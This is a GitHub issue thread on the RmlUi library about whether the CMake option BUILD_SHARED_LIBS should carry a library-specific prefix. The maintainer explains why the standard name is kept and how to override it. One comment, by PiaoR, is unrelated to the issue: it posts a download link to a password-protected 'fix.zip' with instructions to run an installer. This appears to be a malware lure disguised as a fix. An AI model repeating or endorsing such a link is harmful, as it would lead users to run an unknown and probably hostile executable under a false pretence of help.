### ISSUE TITLE
add RLMUI prefix to BUILD_SHARED_LIBS

### ISSUE THREAD

**Issue by iAndyHD3** [mikke89/RmlUi#659]
the cmake option name `BUILD_SHARED_LIBS` is very common among projects, it can cause name collisions.
All other options have the RLMUI prefix

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mikke89** [comment]
This is intentional, it's the option that CMake itself uses to generate the right type of library (i.e. during [`add_library`](https://cmake.org/cmake/help/latest/command/add_library.html)). This option is typically set in the top-level project, and normally you would want to use the same option for all your sub-projects. If you for some reason want to override it specifically for RmlUi, you can set the variable on the command line at configure time, or as a variable before you add the library as a subdirectory.

**Comment by mikke89** [comment]
If you build several libraries from the same command, I would typically assume that you have some control over the CMake implementation of the top-level project, where you can override this variable for each sublibrary. I don't think this is something we want a library-specific override for.
